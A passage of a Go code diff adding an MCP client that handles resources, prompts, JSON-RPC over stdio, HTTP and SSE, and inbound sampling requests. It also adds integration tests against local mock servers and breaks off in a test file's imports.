+func (c *Client) listResources(ctx context.Context) ([]mcpResourceInfo, error) {
+	listCtx, cancel := context.WithTimeout(ctx, mcpListToolsTimeout)
+	defer cancel()
+
+	var all []mcpResourceInfo
+	cursor := ""
+	for page := 0; page < mcpMaxListPages; page++ {
+		params := map[string]any{}
+		if cursor != "" {
+			params["cursor"] = cursor
+		}
+		result, err := c.call(listCtx, "resources/list", params)
+		if err != nil {
+			return nil, err
+		}
+		var out mcpListResourcesResult
+		if err := json.Unmarshal(result, &out); err != nil {
+			return nil, err
+		}
+		all = append(all, out.Resources...)
+		if out.NextCursor == "" {
+			return all, nil
+		}
+		cursor = out.NextCursor
+	}
+	return nil, fmt.Errorf("list MCP resources for %q: too many pages", c.name)
+}
+
+func (c *Client) readResource(ctx context.Context, uri string) (mcpResourceReadResult, error) {
+	result, err := c.call(ctx, "resources/read", map[string]any{"uri": uri})
+	if err != nil {
+		return mcpResourceReadResult{}, err
+	}
+	var out mcpResourceReadResult
+	if err := json.Unmarshal(result, &out); err != nil {
+		return mcpResourceReadResult{}, err
+	}
+	return out, nil
+}
+
+func (c *Client) listPrompts(ctx context.Context) ([]mcpPromptInfo, error) {
+	listCtx, cancel := context.WithTimeout(ctx, mcpListToolsTimeout)
+	defer cancel()
+
+	var all []mcpPromptInfo
+	cursor := ""
+	for page := 0; page < mcpMaxListPages; page++ {
+		params := map[string]any{}
+		if cursor != "" {
+			params["cursor"] = cursor
+		}
+		result, err := c.call(listCtx, "prompts/list", params)
+		if err != nil {
+			return nil, err
+		}
+		var out mcpListPromptsResult
+		if err := json.Unmarshal(result, &out); err != nil {
+			return nil, err
+		}
+		all = append(all, out.Prompts...)
+		if out.NextCursor == "" {
+			return all, nil
+		}
+		cursor = out.NextCursor
+	}
+	return nil, fmt.Errorf("list MCP prompts for %q: too many pages", c.name)
+}
+
+func (c *Client) getPrompt(ctx context.Context, name string, args map[string]any) (mcpPromptGetResult, error) {
+	params := map[string]any{"name": name}
+	if len(args) > 0 {
+		params["arguments"] = args
+	}
+	result, err := c.call(ctx, "prompts/get", params)
+	if err != nil {
+		return mcpPromptGetResult{}, err
+	}
+	var out mcpPromptGetResult
+	if err := json.Unmarshal(result, &out); err != nil {
+		return mcpPromptGetResult{}, err
+	}
+	return out, nil
+}
+
+func (c *Client) call(ctx context.Context, method string, params any) (json.RawMessage, error) {
+	if c.transport == "http" {
+		return c.callHTTP(ctx, method, params)
+	}
+	if c.transport == "sse" {
+		return c.callSSE(ctx, method, params)
+	}
+	id := atomic.AddInt64(&c.nextID, 1)
+	key := fmt.Sprintf("%d", id)
+	ch := make(chan mcpResponse, 1)
+
+	c.mu.Lock()
+	c.pending[key] = ch
+	c.mu.Unlock()
+
+	msg := map[string]any{
+		"jsonrpc": "2.0",
+		"id":      id,
+		"method":  method,
+	}
+	if params != nil {
+		msg["params"] = params
+	}
+	if err := c.writeMessage(msg); err != nil {
+		c.removePending(key)
+		return nil, err
+	}
+
+	select {
+	case <-ctx.Done():
+		c.removePending(key)
+		return nil, ctx.Err()
+	case resp := <-ch:
+		if resp.Error != nil {
+			return nil, fmt.Errorf("%s", resp.Error.Message)
+		}
+		return resp.Result, nil
+	}
+}
+
+func (c *Client) callSSE(ctx context.Context, method string, params any) (json.RawMessage, error) {
+	id := atomic.AddInt64(&c.nextID, 1)
+	key := fmt.Sprintf("%d", id)
+	ch := make(chan mcpResponse, 1)
+	c.mu.Lock()
+	c.pending[key] = ch
+	c.mu.Unlock()
+
+	result, err := c.callHTTPInternal(ctx, method, params, false, &id)
+	if err != nil {
+		c.removePending(key)
+		return nil, err
+	}
+	if len(result) > 0 && string(result) != "{}" {
+		c.removePending(key)
+		return result, nil
+	}
+	select {
+	case <-ctx.Done():
+		c.removePending(key)
+		return nil, ctx.Err()
+	case resp := <-ch:
+		if resp.Error != nil {
+			return nil, fmt.Errorf("%s", resp.Error.Message)
+		}
+		return resp.Result, nil
+	}
+}
+
+func (c *Client) notify(method string, params any) error {
+	if c.transport == "http" || c.transport == "sse" {
+		ctx, cancel := context.WithTimeout(context.Background(), mcpCallTimeout)
+		defer cancel()
+		_, err := c.callHTTPInternal(ctx, method, params, true, nil)
+		return err
+	}
+	msg := map[string]any{
+		"jsonrpc": "2.0",
+		"method":  method,
+	}
+	if params != nil {
+		msg["params"] = params
+	}
+	return c.writeMessage(msg)
+}
+
+func (c *Client) callHTTP(ctx context.Context, method string, params any) (json.RawMessage, error) {
+	return c.callHTTPInternal(ctx, method, params, false, nil)
+}
+
+func (c *Client) callHTTPInternal(ctx context.Context, method string, params any, isNotification bool, reqID *int64) (json.RawMessage, error) {
+	msg := map[string]any{
+		"jsonrpc": "2.0",
+		"method":  method,
+	}
+	var id int64
+	if !isNotification {
+		if reqID != nil {
+			id = *reqID
+		} else {
+			id = atomic.AddInt64(&c.nextID, 1)
+		}
+		msg["id"] = id
+	}
+	if params != nil {
+		msg["params"] = params
+	}
+	body, err := json.Marshal(msg)
+	if err != nil {
+		return nil, err
+	}
+
+	target := c.httpURL
+	if c.transport == "sse" {
+		target = c.messageURL
+	}
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, target, bytes.NewReader(body))
+	if err != nil {
+		return nil, err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "application/json, text/event-stream")
+	for k, v := range c.headers {
+		req.Header.Set(k, v)
+	}
+	if sid := c.currentSessionID(); sid != "" {
+		req.Header.Set("Mcp-Session-Id", sid)
+	}
+	resp, err := c.httpClient.Do(req)
+	if err != nil {
+		return nil, err
+	}
+	defer resp.Body.Close()
+	if sid := strings.TrimSpace(resp.Header.Get("Mcp-Session-Id")); sid != "" {
+		c.setSessionID(sid)
+	}
+	if resp.StatusCode < 200 || resp.StatusCode >= 300 {
+		data, _ := io.ReadAll(io.LimitReader(resp.Body, 8192))
+		return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(data)))
+	}
+	if isNotification || resp.StatusCode == http.StatusAccepted || resp.ContentLength == 0 {
+		return json.RawMessage(`{}`), nil
+	}
+
+	ct := strings.ToLower(resp.Header.Get("Content-Type"))
+	if strings.Contains(ct, "text/event-stream") {
+		return parseSSECallResponse(resp.Body, id)
+	}
+	var rpcResp RPCRequest
+	if err := json.NewDecoder(resp.Body).Decode(&rpcResp); err != nil {
+		return nil, err
+	}
+	if len(rpcResp.Error) > 0 {
+		var rpcErr RPCError
+		if err := json.Unmarshal(rpcResp.Error, &rpcErr); err == nil {
+			return nil, fmt.Errorf("%s", rpcErr.Message)
+		}
+		return nil, fmt.Errorf("%s", string(rpcResp.Error))
+	}
+	return rpcResp.Result, nil
+}
+
+func parseSSECallResponse(r io.Reader, expectID int64) (json.RawMessage, error) {
+	sc := bufio.NewScanner(r)
+	sc.Buffer(make([]byte, 0, 64*1024), 16*1024*1024)
+	var payload strings.Builder
+	for sc.Scan() {
+		line := sc.Text()
+		if strings.HasPrefix(line, "data:") {
+			payload.WriteString(strings.TrimSpace(strings.TrimPrefix(line, "data:")))
+		}
+		if line == "" && payload.Len() > 0 {
+			var rpcResp RPCRequest
+			if err := json.Unmarshal([]byte(payload.String()), &rpcResp); err == nil {
+				if RawIDKey(rpcResp.ID) == fmt.Sprintf("%d", expectID) || len(rpcResp.ID) == 0 {
+					if len(rpcResp.Error) > 0 {
+						var rpcErr RPCError
+						if err := json.Unmarshal(rpcResp.Error, &rpcErr); err == nil {
+							return nil, fmt.Errorf("%s", rpcErr.Message)
+						}
+						return nil, fmt.Errorf("%s", string(rpcResp.Error))
+					}
+					return rpcResp.Result, nil
+				}
+			}
+			payload.Reset()
+		}
+	}
+	if err := sc.Err(); err != nil {
+		return nil, err
+	}
+	return nil, errors.New("no RPC response found in SSE stream")
+}
+
+func (c *Client) writeMessage(msg any) error {
+	if c.closed.Load() {
+		return errors.New("MCP client is closed")
+	}
+	if c.transport == "http" || c.transport == "sse" {
+		return c.postRPCMessage(context.Background(), msg)
+	}
+	if c.stdin == nil {
+		return errors.New("MCP stdin is not available")
+	}
+	data, err := json.Marshal(msg)
+	if err != nil {
+		return err
+	}
+	c.wmu.Lock()
+	defer c.wmu.Unlock()
+	if _, err := c.stdin.Write(data); err != nil {
+		return err
+	}
+	_, err = c.stdin.Write([]byte("\n"))
+	return err
+}
+
+func (c *Client) postRPCMessage(ctx context.Context, msg any) error {
+	data, err := json.Marshal(msg)
+	if err != nil {
+		return err
+	}
+	target := c.httpURL
+	if c.transport == "sse" && c.messageURL != "" {
+		target = c.messageURL
+	}
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, target, bytes.NewReader(data))
+	if err != nil {
+		return err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "application/json")
+	for k, v := range c.headers {
+		req.Header.Set(k, v)
+	}
+	if sid := c.currentSessionID(); sid != "" {
+		req.Header.Set("Mcp-Session-Id", sid)
+	}
+	resp, err := c.httpClient.Do(req)
+	if err != nil {
+		return err
+	}
+	defer resp.Body.Close()
+	if sid := strings.TrimSpace(resp.Header.Get("Mcp-Session-Id")); sid != "" {
+		c.setSessionID(sid)
+	}
+	if resp.StatusCode < 200 || resp.StatusCode >= 300 {
+		body, _ := io.ReadAll(io.LimitReader(resp.Body, 8192))
+		return fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body)))
+	}
+	return nil
+}
+
+func (c *Client) readLoop(r io.Reader) {
+	scanner := bufio.NewScanner(r)
+	scanner.Buffer(make([]byte, 0, 64*1024), 16*1024*1024)
+	for scanner.Scan() {
+		var msg RPCRequest
+		if err := json.Unmarshal(scanner.Bytes(), &msg); err != nil {
+			continue
+		}
+		if len(msg.Method) > 0 {
+			c.handleInboundRequest(msg)
+			continue
+		}
+		if len(msg.ID) == 0 {
+			continue
+		}
+		key := RawIDKey(msg.ID)
+		c.mu.Lock()
+		ch, ok := c.pending[key]
+		if ok {
+			delete(c.pending, key)
+		}
+		c.mu.Unlock()
+		if ok {
+			resp := mcpResponse{Result: msg.Result}
+			if len(msg.Error) > 0 {
+				var rpcErr RPCError
+				if err := json.Unmarshal(msg.Error, &rpcErr); err == nil {
+					resp.Error = &rpcErr
+				} else {
+					resp.Error = &RPCError{Code: -32000, Message: string(msg.Error)}
+				}
+			}
+			ch <- resp
+		}
+	}
+	if err := scanner.Err(); err != nil {
+		c.closePending(fmt.Errorf("MCP server %q output error: %v", c.name, err))
+		return
+	}
+	c.closePending(fmt.Errorf("MCP server %q output closed", c.name))
+}
+
+func (c *Client) readSSELoop(ctx context.Context, streamURL string) {
+	req, err := http.NewRequestWithContext(ctx, http.MethodGet, streamURL, nil)
+	if err != nil {
+		c.closePending(fmt.Errorf("MCP server %q sse request: %v", c.name, err))
+		return
+	}
+	req.Header.Set("Accept", "text/event-stream")
+	for k, v := range c.headers {
+		req.Header.Set(k, v)
+	}
+	resp, err := c.httpClient.Do(req)
+	if err != nil {
+		c.closePending(fmt.Errorf("MCP server %q sse connect: %v", c.name, err))
+		return
+	}
+	defer resp.Body.Close()
+	if resp.StatusCode < 200 || resp.StatusCode >= 300 {
+		data, _ := io.ReadAll(io.LimitReader(resp.Body, 8192))
+		c.closePending(fmt.Errorf("MCP server %q sse HTTP %d: %s", c.name, resp.StatusCode, strings.TrimSpace(string(data))))
+		return
+	}
+	if sid := strings.TrimSpace(resp.Header.Get("Mcp-Session-Id")); sid != "" {
+		c.setSessionID(sid)
+	}
+
+	sc := bufio.NewScanner(resp.Body)
+	sc.Buffer(make([]byte, 0, 64*1024), 16*1024*1024)
+	var dataLines []string
+	for sc.Scan() {
+		line := sc.Text()
+		if strings.HasPrefix(line, "data:") {
+			dataLines = append(dataLines, strings.TrimSpace(strings.TrimPrefix(line, "data:")))
+			continue
+		}
+		if line != "" {
+			continue
+		}
+		if len(dataLines) == 0 {
+			continue
+		}
+		payload := strings.Join(dataLines, "")
+		dataLines = dataLines[:0]
+		var msg RPCRequest
+		if err := json.Unmarshal([]byte(payload), &msg); err != nil {
+			continue
+		}
+		if len(msg.Method) > 0 {
+			c.handleInboundRequest(msg)
+			continue
+		}
+		if len(msg.ID) == 0 {
+			continue
+		}
+		key := RawIDKey(msg.ID)
+		c.mu.Lock()
+		ch, ok := c.pending[key]
+		if ok {
+			delete(c.pending, key)
+		}
+		c.mu.Unlock()
+		if !ok {
+			continue
+		}
+		respMsg := mcpResponse{Result: msg.Result}
+		if len(msg.Error) > 0 {
+			var rpcErr RPCError
+			if err := json.Unmarshal(msg.Error, &rpcErr); err == nil {
+				respMsg.Error = &rpcErr
+			} else {
+				respMsg.Error = &RPCError{Code: -32000, Message: string(msg.Error)}
+			}
+		}
+		ch <- respMsg
+	}
+	if err := sc.Err(); err != nil {
+		c.closePending(fmt.Errorf("MCP server %q sse stream error: %v", c.name, err))
+		return
+	}
+	c.closePending(fmt.Errorf("MCP server %q sse stream closed", c.name))
+}
+
+func (c *Client) removePending(key string) {
+	c.mu.Lock()
+	delete(c.pending, key)
+	c.mu.Unlock()
+}
+
+func (c *Client) closePending(err error) {
+	c.mu.Lock()
+	pending := c.pending
+	c.pending = make(map[string]chan mcpResponse)
+	c.mu.Unlock()
+	for _, ch := range pending {
+		ch <- mcpResponse{Error: &RPCError{Code: -32000, Message: err.Error()}}
+	}
+}
+
+func (c *Client) Close() {
+	if !c.closed.CompareAndSwap(false, true) {
+		return
+	}
+	if c.stdin != nil {
+		_ = c.stdin.Close()
+	}
+	c.closePending(fmt.Errorf("MCP client %q closed", c.name))
+	if c.sseCancel != nil {
+		c.sseCancel()
+	}
+	if c.cmd != nil && c.cmd.Process != nil {
+		_ = c.cmd.Process.Kill()
+	}
+}
+
+func RawIDKey(id json.RawMessage) string {
+	return strings.Trim(string(id), "\"")
+}
+
+type mcpTool struct {
+	client *Client
+	info   mcpToolInfo
+	name   string
+}
+
+type mcpResourceTool struct {
+	client *Client
+	info   mcpResourceInfo
+	name   string
+}
+
+type mcpPromptTool struct {
+	client *Client
+	info   mcpPromptInfo
+	name   string
+}
+
+func newMCPTool(client *Client, info mcpToolInfo, existing map[string]struct{}) tools.Tool {
+	base := "mcp_" + SanitizeToolName(client.name) + "_" + SanitizeToolName(info.Name)
+	name := uniqueToolName(base, existing)
+	return &mcpTool{
+		client: client,
+		info:   info,
+		name:   name,
+	}
+}
+
+func (t *mcpTool) Name() string {
+	return t.name
+}
+
+func (t *mcpTool) Description() string {
+	if t.info.Description != "" {
+		return t.info.Description
+	}
+	return "Tool provided by MCP server " + t.client.name
+}
+
+func (t *mcpTool) PromptSnippet() string {
+	return fmt.Sprintf("%s: MCP tool %q from server %q", t.name, t.info.Name, t.client.name)
+}
+
+func (t *mcpTool) PromptGuidelines() []string {
+	return nil
+}
+
+func (t *mcpTool) Parameters() json.RawMessage {
+	if len(t.info.InputSchema) == 0 {
+		return json.RawMessage(`{"type":"object"}`)
+	}
+	return t.info.InputSchema
+}
+
+func (t *mcpTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	result, err := t.client.callTool(ctx, t.info.Name, params)
+	text := mcpContentToText(result.Content)
+	if text == "" && err != nil {
+		text = err.Error()
+	}
+	return tools.NewTextToolResult(text), err
+}
+
+func newMCPResourceTool(client *Client, info mcpResourceInfo, existing map[string]struct{}) tools.Tool {
+	id := info.Name
+	if strings.TrimSpace(id) == "" {
+		id = info.URI
+	}
+	base := "mcp_" + SanitizeToolName(client.name) + "_resource_" + SanitizeToolName(id)
+	return &mcpResourceTool{
+		client: client,
+		info:   info,
+		name:   uniqueToolName(base, existing),
+	}
+}
+
+func (t *mcpResourceTool) Name() string { return t.name }
+func (t *mcpResourceTool) Description() string {
+	if strings.TrimSpace(t.info.Description) != "" {
+		return t.info.Description
+	}
+	return "Read MCP resource " + t.info.URI + " from server " + t.client.name
+}
+func (t *mcpResourceTool) PromptSnippet() string {
+	return fmt.Sprintf("%s: MCP resource reader for %q on %q", t.name, t.info.URI, t.client.name)
+}
+func (t *mcpResourceTool) PromptGuidelines() []string { return nil }
+func (t *mcpResourceTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{"type":"object","properties":{"uri":{"type":"string","description":"Override resource URI (optional)."}}}`)
+}
+func (t *mcpResourceTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	uri := t.info.URI
+	if v, ok := params["uri"].(string); ok && strings.TrimSpace(v) != "" {
+		uri = v
+	}
+	out, err := t.client.readResource(ctx, uri)
+	text := mcpContentToText(out.Contents)
+	if text == "" && err != nil {
+		text = err.Error()
+	}
+	return tools.NewTextToolResult(text), err
+}
+
+func newMCPPromptTool(client *Client, info mcpPromptInfo, existing map[string]struct{}) tools.Tool {
+	base := "mcp_" + SanitizeToolName(client.name) + "_prompt_" + SanitizeToolName(info.Name)
+	return &mcpPromptTool{
+		client: client,
+		info:   info,
+		name:   uniqueToolName(base, existing),
+	}
+}
+
+func (t *mcpPromptTool) Name() string { return t.name }
+func (t *mcpPromptTool) Description() string {
+	if strings.TrimSpace(t.info.Description) != "" {
+		return t.info.Description
+	}
+	return "Render MCP prompt " + t.info.Name + " from server " + t.client.name
+}
+func (t *mcpPromptTool) PromptSnippet() string {
+	return fmt.Sprintf("%s: MCP prompt %q from server %q", t.name, t.info.Name, t.client.name)
+}
+func (t *mcpPromptTool) PromptGuidelines() []string { return nil }
+func (t *mcpPromptTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{"type":"object","additionalProperties":true,"description":"Arguments passed to prompts/get."}`)
+}
+func (t *mcpPromptTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	out, err := t.client.getPrompt(ctx, t.info.Name, params)
+	var parts []string
+	if strings.TrimSpace(out.Description) != "" {
+		parts = append(parts, out.Description)
+	}
+	for _, msg := range out.Messages {
+		content := mcpContentToText([]mcpContentBlock{msg.Content})
+		if strings.TrimSpace(content) == "" {
+			continue
+		}
+		parts = append(parts, fmt.Sprintf("[%s]\n%s", msg.Role, content))
+	}
+	text := strings.Join(parts, "\n\n")
+	if text == "" && err != nil {
+		text = err.Error()
+	}
+	return tools.NewTextToolResult(text), err
+}
+
+func SanitizeToolName(name string) string {
+	var b strings.Builder
+	for _, r := range name {
+		switch {
+		case r >= 'a' && r <= 'z':
+			b.WriteRune(r)
+		case r >= 'A' && r <= 'Z':
+			b.WriteRune(r)
+		case r >= '0' && r <= '9':
+			b.WriteRune(r)
+		default:
+			b.WriteByte('_')
+		}
+	}
+	out := strings.Trim(b.String(), "_")
+	if out == "" {
+		return "tool"
+	}
+	return out
+}
+
+func mcpContentToText(blocks []mcpContentBlock) string {
+	var parts []string
+	for _, block := range blocks {
+		switch block.Type {
+		case "text":
+			if block.Text != "" {
+				parts = append(parts, block.Text)
+			}
+		case "image", "audio":
+			parts = append(parts, fmt.Sprintf("[%s content: %s]", block.Type, block.MimeType))
+		default:
+			if block.Type == "json" && len(block.JSON) > 0 {
+				parts = append(parts, string(block.JSON))
+				continue
+			}
+			data, _ := json.Marshal(block)
+			if len(data) > 0 {
+				parts = append(parts, string(data))
+			}
+		}
+	}
+	return strings.Join(parts, "\n")
+}
+
+func uniqueToolName(base string, existing map[string]struct{}) string {
+	if _, ok := existing[base]; !ok {
+		return base
+	}
+	for i := 2; i < 1_000_000; i++ {
+		candidate := fmt.Sprintf("%s_%d", base, i)
+		if _, ok := existing[candidate]; !ok {
+			return candidate
+		}
+	}
+	return fmt.Sprintf("%s_%d", base, time.Now().UnixNano())
+}
+
+func extractSamplingPrompt(params json.RawMessage) string {
+	var req struct {
+		Messages []struct {
+			Content any `json:"content"`
+		} `json:"messages"`
+	}
+	if err := json.Unmarshal(params, &req); err != nil {
+		return ""
+	}
+
+	var parts []string
+	for _, msg := range req.Messages {
+		switch content := msg.Content.(type) {
+		case string:
+			if strings.TrimSpace(content) != "" {
+				parts = append(parts, content)
+			}
+		case []any:
+			for _, item := range content {
+				block, ok := item.(map[string]any)
+				if !ok {
+					continue
+				}
+				if blockType, _ := block["type"].(string); blockType != "" && blockType != "text" {
+					continue
+				}
+				text, _ := block["text"].(string)
+				if strings.TrimSpace(text) != "" {
+					parts = append(parts, text)
+				}
+			}
+		case map[string]any:
+			text, _ := content["text"].(string)
+			if strings.TrimSpace(text) != "" {
+				parts = append(parts, text)
+			}
+		}
+	}
+	return strings.Join(parts, "\n")
+}
+
+func (c *Client) handleInboundRequest(msg RPCRequest) {
+	if len(msg.ID) == 0 {
+		c.handleInboundNotification(msg)
+		return
+	}
+	switch msg.Method {
+	case "ping":
+		_ = c.writeMessage(map[string]any{
+			"jsonrpc": "2.0",
+			"id":      msg.ID,
+			"result":  map[string]any{},
+		})
+	case "sampling/createMessage":
+		if c.callbacks.OnSamplingCreateMessage != nil {
+			result, rpcErr := c.callbacks.OnSamplingCreateMessage(context.Background(), c.name, msg.Params)
+			if rpcErr != nil {
+				_ = c.writeMessage(map[string]any{
+					"jsonrpc": "2.0",
+					"id":      msg.ID,
+					"error":   rpcErr,
+				})
+				return
+			}
+			var anyResult any = map[string]any{}
+			if len(result) > 0 {
+				_ = json.Unmarshal(result, &anyResult)
+			}
+			_ = c.writeMessage(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      msg.ID,
+				"result":  anyResult,
+			})
+			return
+		}
+		_ = c.writeMessage(map[string]any{
+			"jsonrpc": "2.0",
+			"id":      msg.ID,
+			"error": map[string]any{
+				"code":    -32601,
+				"message": "sampling/createMessage is not enabled in this ACP runtime yet",
+			},
+		})
+	default:
+		_ = c.writeMessage(map[string]any{
+			"jsonrpc": "2.0",
+			"id":      msg.ID,
+			"error": map[string]any{
+				"code":    -32601,
+				"message": "method not found",
+			},
+		})
+	}
+}
+
+func (c *Client) handleInboundNotification(msg RPCRequest) {
+	if c.callbacks.OnNotification != nil {
+		c.callbacks.OnNotification(c.name, msg.Method, msg.Params)
+	}
+	switch msg.Method {
+	case "notifications/progress":
+		return
+	case "notifications/message", "logging/message":
+		return
+	case "notifications/cancelled":
+		return
+	default:
+		return
+	}
+}
diff --git a/internal/mcp/mcp_http_integration_test.go b/internal/mcp/mcp_http_integration_test.go
new file mode 100644
index 0000000..b1966e9
--- /dev/null
+++ b/internal/mcp/mcp_http_integration_test.go
@@ -0,0 +1,232 @@
+package mcp
+
+import (
+	"context"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"sync"
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+func TestConnectMCPServersHTTPRegistersAndExecutes(t *testing.T) {
+	var mu sync.Mutex
+	var sampled bool
+	var notified bool
+
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		defer r.Body.Close()
+		var req RPCRequest
+		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+			w.WriteHeader(http.StatusBadRequest)
+			_, _ = w.Write([]byte(`{"error":"bad json"}`))
+			return
+		}
+		w.Header().Set("Content-Type", "application/json")
+		switch req.Method {
+		case "initialize":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"id":      1,
+				"result":  map[string]any{"protocolVersion": mcpProtocolVersion},
+			})
+		case "notifications/initialized":
+			_ = json.NewEncoder(w).Encode(map[string]any{"jsonrpc": "2.0", "result": map[string]any{}})
+		case "tools/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"result": map[string]any{
+					"tools": []map[string]any{
+						{
+							"name":        "echo",
+							"description": "echo tool",
+							"inputSchema": map[string]any{"type": "object"},
+						},
+					},
+				},
+			})
+		case "resources/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"result": map[string]any{
+					"resources": []map[string]any{
+						{"uri": "file://README.md", "name": "readme"},
+					},
+				},
+			})
+		case "prompts/list":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"result": map[string]any{
+					"prompts": []map[string]any{
+						{"name": "summarize", "description": "summarize prompt"},
+					},
+				},
+			})
+		case "tools/call":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"result": map[string]any{
+					"content": []map[string]any{{"type": "text", "text": "ok"}},
+				},
+			})
+		case "resources/read":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"result": map[string]any{
+					"contents": []map[string]any{{"type": "text", "text": "resource-body"}},
+				},
+			})
+		case "prompts/get":
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"result": map[string]any{
+					"description": "prompt-desc",
+					"messages": []map[string]any{
+						{"role": "user", "content": map[string]any{"type": "text", "text": "prompt-text"}},
+					},
+				},
+			})
+		case "sampling/createMessage":
+			mu.Lock()
+			sampled = true
+			mu.Unlock()
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"result": map[string]any{
+					"content": []map[string]any{{"type": "text", "text": "sampled"}},
+				},
+			})
+		case "notifications/progress":
+			mu.Lock()
+			notified = true
+			mu.Unlock()
+			_ = json.NewEncoder(w).Encode(map[string]any{"jsonrpc": "2.0", "result": map[string]any{}})
+		default:
+			_ = json.NewEncoder(w).Encode(map[string]any{
+				"jsonrpc": "2.0",
+				"error":   map[string]any{"code": -32601, "message": "method not found"},
+			})
+		}
+	}))
+	defer srv.Close()
+
+	tmp := t.TempDir()
+	registry := tools.NewRegistry(tmp, sandbox.NewNoneSandbox())
+	registry.RegisterDefaults()
+
+	clients, err := ConnectServers(context.Background(), []ServerConfig{
+		{Name: "mock-http", Type: "http", URL: srv.URL},
+	}, registry, Callbacks{
+		OnNotification: func(serverName, method string, params json.RawMessage) {
+			if serverName == "mock-http" && method == "notifications/progress" {
+				mu.Lock()
+				notified = true
+				mu.Unlock()
+			}
+		},
+		OnSamplingCreateMessage: func(ctx context.Context, serverName string, params json.RawMessage) (json.RawMessage, *RPCError) {
+			if serverName != "mock-http" {
+				return nil, &RPCError{Code: -32000, Message: "bad server"}
+			}
+			mu.Lock()
+			sampled = true
+			mu.Unlock()
+			return json.RawMessage(`{"content":[{"type":"text","text":"sampled"}]}`), nil
+		},
+	})
+	if err != nil {
+		t.Fatalf("ConnectServers failed: %v", err)
+	}
+	defer CloseClients(clients)
+	if len(clients) != 1 {
+		t.Fatalf("expected 1 client, got %d", len(clients))
+	}
+
+	var gotTool, gotResource, gotPrompt tools.Tool
+	for _, tdef := range registry.All() {
+		switch {
+		case strings.Contains(tdef.Name(), "_echo"):
+			gotTool = tdef
+		case strings.Contains(tdef.Name(), "_resource_"):
+			gotResource = tdef
+		case strings.Contains(tdef.Name(), "_prompt_"):
+			gotPrompt = tdef
+		}
+	}
+	if gotTool == nil || gotResource == nil || gotPrompt == nil {
+		t.Fatalf("expected tool/resource/prompt registrations, got tool=%v resource=%v prompt=%v", gotTool != nil, gotResource != nil, gotPrompt != nil)
+	}
+
+	if _, err := gotTool.Execute(context.Background(), map[string]any{}); err != nil {
+		t.Fatalf("tool execute failed: %v", err)
+	}
+	resOut, err := gotResource.Execute(context.Background(), map[string]any{})
+	if err != nil {
+		t.Fatalf("resource execute failed: %v", err)
+	}
+	if !strings.Contains(resOut.Text, "resource-body") {
+		t.Fatalf("unexpected resource output: %q", resOut.Text)
+	}
+	promptOut, err := gotPrompt.Execute(context.Background(), map[string]any{})
+	if err != nil {
+		t.Fatalf("prompt execute failed: %v", err)
+	}
+	if !strings.Contains(promptOut.Text, "prompt-text") {
+		t.Fatalf("unexpected prompt output: %q", promptOut.Text)
+	}
+
+	clients[0].handleInboundRequest(RPCRequest{
+		JSONRPC: "2.0",
+		ID:      json.RawMessage(`1`),
+		Method:  "sampling/createMessage",
+		Params:  json.RawMessage(`{"messages":[{"role":"user","content":"hi"}]}`),
+	})
+	clients[0].handleInboundRequest(RPCRequest{
+		JSONRPC: "2.0",
+		Method:  "notifications/progress",
+		Params:  json.RawMessage(`{"progress":0.5}`),
+	})
+	mu.Lock()
+	wasSampled := sampled
+	wasNotified := notified
+	mu.Unlock()
+	if !wasSampled {
+		t.Fatal("expected sampling callback to be triggered")
+	}
+	if !wasNotified {
+		t.Fatal("expected notification callback to be triggered")
+	}
+}
+
+func TestMCPHTTPSessionIDHeaderRoundTrip(t *testing.T) {
+	const sid = "sid-123"
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Header.Get("Mcp-Session-Id") == "" {
+			w.Header().Set("Mcp-Session-Id", sid)
+		}
+		w.Header().Set("Content-Type", "application/json")
+		_ = json.NewEncoder(w).Encode(map[string]any{
+			"jsonrpc": "2.0",
+			"result":  map[string]any{"tools": []any{}},
+		})
+	}))
+	defer srv.Close()
+
+	registry := tools.NewRegistry(t.TempDir(), sandbox.NewNoneSandbox())
+	registry.RegisterDefaults()
+	clients, err := ConnectServers(context.Background(), []ServerConfig{
+		{Name: "sid-server", Type: "http", URL: srv.URL},
+	}, registry, Callbacks{})
+	if err != nil {
+		t.Fatalf("connect failed: %v", err)
+	}
+	defer CloseClients(clients)
+	if clients[0].sessionID != sid {
+		t.Fatalf("expected session id %q, got %q", sid, clients[0].sessionID)
+	}
+}
diff --git a/internal/mcp/mcp_sse_integration_test.go b/internal/mcp/mcp_sse_integration_test.go
new file mode 100644
index 0000000..692fee2
--- /dev/null
+++ b/internal/mcp/mcp_sse_integration_test.go
@@ -0,0 +1,263 @@
+package mcp
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
